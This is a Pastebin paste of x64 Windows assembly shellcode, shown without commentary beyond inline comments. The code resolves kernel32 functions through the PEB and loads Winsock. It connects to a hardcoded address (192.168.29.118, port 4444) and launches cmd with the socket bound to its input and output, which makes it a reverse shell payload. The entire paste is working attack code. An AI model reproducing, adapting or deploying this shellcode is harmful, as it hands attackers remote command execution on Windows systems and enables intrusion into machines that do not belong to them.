API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 24th, 2022
158
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.26 KB | None | 0 0
raw download clone embed print report
  1. BITS 64
  2.  
  3.  
  4. SECTION .text
  5. global start
  6. start:
  7.  
  8. ;push rbp
  9. ;mov rbp, rsp
  10.  
  11. ;sub rsp, 0x28 ; 40 bytes of shadow space
  12. ;and rsp, 0FFFFFFFFFFFFFFF0h ; Align the stack to a multiple of 16 bytes
  13.  
  14. ; Parse PEB and find kernel32
  15.  
  16. xor rcx, rcx ; RCX = 0
  17. mov rax, [gs:rcx + 0x60] ; RAX = PEB
  18. mov rax, [rax + 0x18] ; RAX = PEB->Ldr
  19. mov rsi, [rax + 0x20] ; RSI = PEB->Ldr.InMemOrder
  20. lodsq ; RAX = Second module
  21. xchg rax, rsi ; RAX = RSI, RSI = RAX
  22. lodsq ; RAX = Third(kernel32)
  23. mov rbx, [rax + 0x20] ; RBX = Base address
  24.  
  25. ; Parse kernel32 PE
  26.  
  27. xor r8, r8 ; Clear r8
  28. mov r8d, [rbx + 0x3c] ; R8D = DOS->e_lfanew offset
  29. mov rdx, r8 ; RDX = DOS->e_lfanew
  30. add rdx, rbx ; RDX = PE Header
  31. mov r8d, [rdx + 0x88] ; R8D = Offset export table
  32. add r8, rbx ; R8 = Export table
  33. xor rsi, rsi ; Clear RSI
  34. mov esi, [r8 + 0x20] ; RSI = Offset namestable
  35. add rsi, rbx ; RSI = Names table
  36. xor rcx, rcx ; RCX = 0
  37. mov r9, 0x41636f7250746547 ; GetProcA
  38.  
  39. ; Loop through exported functions and find GetProcAddress
  40.  
  41. Get_Function:
  42.  
  43. inc rcx ; Increment the ordinal
  44. xor rax, rax ; RAX = 0
  45. mov eax, [rsi + rcx * 4] ; Get name offset
  46. add rax, rbx ; Get function name
  47. cmp QWORD [rax], r9 ; GetProcA ?
  48. jnz Get_Function
  49. xor rsi, rsi ; RSI = 0
  50. mov esi, [r8 + 0x24] ; ESI = Offset ordinals
  51. add rsi, rbx ; RSI = Ordinals table
  52. mov cx, [rsi + rcx * 2] ; Number of function
  53. xor rsi, rsi ; RSI = 0
  54. mov esi, [r8 + 0x1c] ; Offset address table
  55. add rsi, rbx ; ESI = Address table
  56. xor rdx, rdx ; RDX = 0
  57. mov edx, [rsi + rcx * 4] ; EDX = Pointer(offset)
  58. add rdx, rbx ; RDX = GetProcAddress
  59. mov rdi, rdx ; Save GetProcAddress in RDI
  60.  
  61. ; Use GetProcAddress to find the address of LoadLibrary
  62.  
  63. mov rcx, 0x41797261 ; aryA
  64. push rcx ; Push on the stack
  65. mov rcx, 0x7262694c64616f4c ; LoadLibr
  66. push rcx ; Push on stack
  67. mov rdx, rsp ; LoadLibraryA
  68. mov rcx, rbx ; kernel32.dll base address (rbx never changes so we could use it later for CreateProcessA)
  69. sub rsp, 0x20 ; Allocate stack space for function call
  70. call rdi ; Call GetProcAddress
  71. add rsp, 0x20 ; Cleanup allocated stack space
  72. mov rsi, rax ; LoadLibrary saved in RSI
  73.  
  74. ;getws2_32:
  75. mov rcx, 0x6c6c ; ll
  76. push rcx ; Push on the stack
  77. mov rcx, 0x642e32335f327377 ; d.32_2sw
  78. push rcx ; Push on the stack
  79. mov rcx, rsp ; ws2_32.dll
  80. sub rsp, 0x20 ; Allocate stack space for function call
  81. call rsi ; call Loadlibrary (stored in rsi) and find ws2_32.dll
  82. add rsp, 0x20 ; Cleanup allocated stack space
  83. mov r15, rax ; base address of ws2_32.dll saved in local variable r15 (winsock handle)
  84.  
  85. ;getWSAStartup:
  86. mov rcx, 0x7075 ; pu
  87. push rcx ; Push on the stack
  88. mov rcx, 0x7472617453415357 ; tratSASW
  89. push rcx ;Push on the stack
  90. mov rdx, rsp ; copy WSAStartup from stack to 2nd argument (rdx is the 2nd arg)
  91. mov rcx, r15 ; winsock handler
  92. sub rsp, 0x20 ; Allocate stack space for function call
  93. call rdi ; GetProcAddress(ws2_32.dll, WSAStartup)
  94. add rsp, 0x20 ; Cleanup allocated stack space
  95. mov r14, rax ; ws2_32.WSAStartup saved in r14
  96.  
  97.  
  98. ;callWSAStartUp:
  99. ; stack style
  100. xor rcx, rcx
  101. mov cx, 0x190 ; 0x190 works only when 0x28 bytes are subtracted, no more, no less!!!
  102. sub rsp,rcx
  103. lea rdx,[rsp]
  104. xor rcx, rcx
  105. mov cx,0x202
  106. sub rsp, 0x28
  107. call r14 ; call WSAStartup(MAKEWORD(2, 2), wsadata_pointer)
  108. add rsp, 0x28
  109. add rsp, 0x190
  110.  
  111.  
  112.  
  113.  
  114. ;getWSASocketA:
  115. xor rdx, rdx
  116. xor rcx, rcx
  117. mov rcx, 0x4174 ; 'At' original
  118. push rcx ; push on stack
  119. mov rcx, 0x656b636f53415357 ; 'ekcoSASW'
  120. push rcx ; push on stack
  121. mov rdx, rsp ; copy string of WSASocketA contents from stack to rdx (2nd arg for GetProcAddress)
  122. mov rcx, r15 ; socket handler ws2_32.dll
  123. sub rsp, 0x30
  124. call rdi ; GetProcAddress(ws2_32.dll, WSASocketA)
  125. add rsp, 0x30 ; Cleanup allocated stack space: standard is 32 bytes but 2 pushes = 16 more = 48 = 0x30
  126. mov r13, rax ; save ws2_32.WSASocketA to r13
  127.  
  128. sub rsp, 0x38
  129. ;callWSASocketA:
  130. mov qword[rsp+0x20],0
  131. mov qword[rsp+0x28], 0
  132. xor r9, r9
  133. mov r9, 0
  134. xor r8, r8
  135. mov r8, 0x6 ; protocol=6
  136. xor rdx, rdx
  137. mov rdx, 0x1 ; type=1
  138. xor rcx, rcx
  139. mov rcx, 0x2 ; af=2
  140. call r13 ; call WSASocketA
  141. add rsp, 0x28 ; Cleanup allocated stack space = 48 bytes = 0x30
  142. mov r14, rax ; save socket descriptor of WSASocketA to r14
  143.  
  144. loadconnect:
  145. mov rcx, 0x7463656e6e6f63 ; nnoc
  146. push rcx
  147. mov rdx, rsp
  148. mov rcx, r15
  149. sub rsp, 0x30
  150. call rdi
  151. add rsp, 0x30
  152.  
  153. callConnect:
  154. ; ;set up sockaddr_in
  155. mov rdx, 0x761da8c0 ;ip 192.168.29.118
  156. push rdx ;push sin_addr
  157. push word 0x5c11 ;0x115c = (port 4444)
  158. xor edx, edx
  159. mov dl, 2
  160. push word dx
  161. mov rdx, rsp
  162. mov rcx, r14
  163. sub rsp, 0x30
  164. call rax
  165. add rsp, 0x30
  166.  
  167. getCreateProcessA:
  168. mov rcx, 0x41737365636f ; ecor
  169. push rcx
  170. mov rcx, 0x7250657461657243 ; aerC
  171. push rcx ; push the pointer to stack
  172. mov rdx, rsp
  173. mov rcx, rbx
  174. sub rsp, 0x30
  175. call rdi
  176. add rsp, 0x30
  177. mov rbx, rax
  178.  
  179. ;STARTUPINFOA+PROCESS_INFORMATION
  180. ;----------------------------------
  181. push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
  182. pop rcx ; Set ECX for the loop
  183. xor r11,r11
  184. push_loop:
  185.  
  186. push r11 ; push a null dword
  187. loop push_loop ; keep looping untill we have pushed enough nulls
  188. lea r12,[rsp]
  189.  
  190. mov dl,104
  191.  
  192. xor rcx,rcx
  193. mov [r12],dword edx
  194. mov [r12+4],rcx
  195. mov [r12+12],rcx
  196. mov [r12+20],rcx
  197. mov [r12+24],rcx
  198.  
  199. xor rdx,rdx
  200. mov dl,255
  201. inc rdx
  202.  
  203. mov [r12+0x3c],edx
  204. mov [r12+0x50],r14 ; HANDLE hStdInput;
  205. mov [r12+0x58],r14 ; HANDLE hStdOutput;
  206. mov [r12+0x60],r14 ;HANDLE hStdError;
  207.  
  208.  
  209. ;createprocessA_calling
  210. sub rsp, 0x70
  211.  
  212. push 'cmdA'
  213. mov [rsp+3],byte dl
  214.  
  215. lea rdx,[rsp]
  216. inc rcx
  217. mov [rsp+32],rcx
  218. xor rcx,rcx
  219.  
  220. xor r8,r8
  221.  
  222. mov [rsp+40],r8
  223. mov [rsp+48],r8
  224. mov [rsp+56],r8
  225. lea r9,[r12]
  226. mov [rsp+64],r9
  227. lea r9,[r12+104]
  228. mov [rsp+72],r9
  229.  
  230. xor r9,r9
  231.  
  232. call rbx ;createprocessA
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239.  
  240.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!